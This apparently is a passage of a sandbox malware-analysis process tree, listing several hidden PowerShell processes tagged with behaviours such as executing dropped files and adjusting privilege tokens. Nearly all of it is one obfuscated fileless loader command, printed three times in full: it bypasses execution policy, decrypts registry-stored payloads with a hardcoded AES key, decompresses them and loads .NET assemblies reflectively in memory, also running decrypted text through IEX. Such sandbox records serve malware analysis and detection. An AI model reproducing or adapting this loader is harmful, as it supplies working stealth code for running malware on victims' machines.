                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4812
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3216
                                                      • C:\Windows\$sxr-powershell.exe
                                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2164).WaitForExit();[System.Threading.Thread]::Sleep(5000); function xFEyP($JUbKm){ $IXgJU=[System.Security.Cryptography.Aes]::Create(); $IXgJU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IXgJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IXgJU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w='); $IXgJU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g=='); $IKtSy=$IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')(); $MANst=$IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JUbKm, 0, $JUbKm.Length); $IKtSy.Dispose(); $IXgJU.Dispose(); $MANst;}function hzLpy($JUbKm){ $nSCRw=New-Object System.IO.MemoryStream(,$JUbKm); $LwLqj=New-Object System.IO.MemoryStream; $JufCW=New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::Decompress); $JufCW.CopyTo($LwLqj); $JufCW.Dispose(); $nSCRw.Dispose(); $LwLqj.Dispose(); $LwLqj.ToArray();}function qbGWz($JUbKm,$TKtew){ $hOjGD=[System.Reflection.Assembly]::Load([byte[]]$JUbKm); $nykSy=$hOjGD.EntryPoint; $nykSy.Invoke($null, $TKtew);}$IXgJU1 = New-Object System.Security.Cryptography.AesManaged;$IXgJU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$DYLOP = $IXgJU1.('rotpyrceDetaerC'[-1..-15] -join '')();$xYJPG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nikA7tS4MbL6+pcdhh40nw==');$xYJPG = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG, 0, $xYJPG.Length);$xYJPG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG);$PEZij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fR4QSYjqVq3kCKCNB0zoT/EzmQDFXjJreLyVCFpmQaM=');$PEZij = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PEZij, 0, $PEZij.Length);$PEZij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PEZij);$SvBfZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vm5KOH2NwZml0sQ127on5Q==');$SvBfZ = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SvBfZ, 0, $SvBfZ.Length);$SvBfZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SvBfZ);$uWxtU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UGWpGZkglw05m3QUhBQnOYFO/fyws7Tq9HuPtIcmFSPSV6JoA8MXIuJZyKmMngQCAkhPBhUTwcMKqu/qd0jNeM9C2aYBF1zGVHAMtM401134VOcnBfqt5m6+PrtdUXqF1M27DGeoWl0q3DtRZTRI9Ud/nFSL9f3UgKKlrCj0AGRK3Q3ERG4uw0jynpujv26bvINXrixhA82tZh9lctMwlDA6eXHPREe8vWhOvdvzObkvtgrkUCXGwls7Xkes8pD0t5mBdxDMMfMjNUpNgw6vcqoQQtoad78QTTtFP7ChahkgxjPKTAhbHjlbVshzH9l0OrIqsATZnWaKUP5JS5fYghEr3jTuLcPctPxMvW1e1GCFvwNeVk/kT54fI1M552VYVuqcAEqiedpPBXkDH6Q25WIY2GicEQfbinZO6IUVFc8=');$uWxtU = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uWxtU, 0, $uWxtU.Length);$uWxtU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uWxtU);$DDUmW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0uPWJD7N6EM3Gyy58ZZW2g==');$DDUmW = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DDUmW, 0, $DDUmW.Length);$DDUmW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DDUmW);$wgHTz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGOP1wSv7Yi99UHBGZCiyA==');$wgHTz = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wgHTz, 0, $wgHTz.Length);$wgHTz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wgHTz);$pclRc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VyRcTnXy5unLECwX50S0CQ==');$pclRc = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pclRc, 0, $pclRc.Length);$pclRc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pclRc);$NRYME = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+dEH6faSs3PNfoaqjmpgkA==');$NRYME = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NRYME, 0, $NRYME.Length);$NRYME = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NRYME);$eUTAt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DkdrrrMERB+nGH2+b/f64w==');$eUTAt = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eUTAt, 0, $eUTAt.Length);$eUTAt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eUTAt);$xYJPG0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xkJwjn7oMP9IPDdaDtjmcA==');$xYJPG0 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG0, 0, $xYJPG0.Length);$xYJPG0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG0);$xYJPG1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PYP8GLKW6aUoKmf5pknXwg==');$xYJPG1 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG1, 0, $xYJPG1.Length);$xYJPG1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG1);$xYJPG2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDd4W4708IQJzHiRcino9Q==');$xYJPG2 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG2, 0, $xYJPG2.Length);$xYJPG2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG2);$xYJPG3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ysYU2Lu0SKMOlUY+eSbMPA==');$xYJPG3 = $DYLOP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xYJPG3, 0, $xYJPG3.Length);$xYJPG3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xYJPG3);$DYLOP.Dispose();$IXgJU1.Dispose();$oppGA = [Microsoft.Win32.Registry]::$NRYME.$pclRc($xYJPG).$wgHTz($PEZij);$UcyFL=[string[]]$oppGA.Split('\');$VKQMD=hzLpy(xFEyP([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[1])));qbGWz $VKQMD (,[string[]] ('%*'));$ZbZue = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($UcyFL[0]);$IXgJU = New-Object System.Security.Cryptography.AesManaged;$IXgJU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IXgJU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IXgJU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SW3ru+/MjR9WpfHUJLJZ86KMc9JJtYKXrxj9adJvD0w=');$IXgJU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bShGQyLVFYlLoL22UaNH/g==');$IKtSy = $IXgJU.('rotpyrceDetaerC'[-1..-15] -join '')();$ZbZue = $IKtSy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZbZue, 0, $ZbZue.Length);$IKtSy.Dispose();$IXgJU.Dispose();$nSCRw = New-Object System.IO.MemoryStream(, $ZbZue);$LwLqj = New-Object System.IO.MemoryStream;$JufCW = New-Object System.IO.Compression.GZipStream($nSCRw, [IO.Compression.CompressionMode]::$xYJPG1);$JufCW.$eUTAt($LwLqj);$JufCW.Dispose();$nSCRw.Dispose();$LwLqj.Dispose();$ZbZue = $LwLqj.ToArray();$dSRKT = $uWxtU | IEX;$hOjGD = $dSRKT::$xYJPG2($ZbZue);$nykSy = $hOjGD.EntryPoint;$nykSy.$xYJPG0($null, (, [string[]] ($SvBfZ)))
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4424
                                                      • C:\Windows\$sxr-powershell.exe
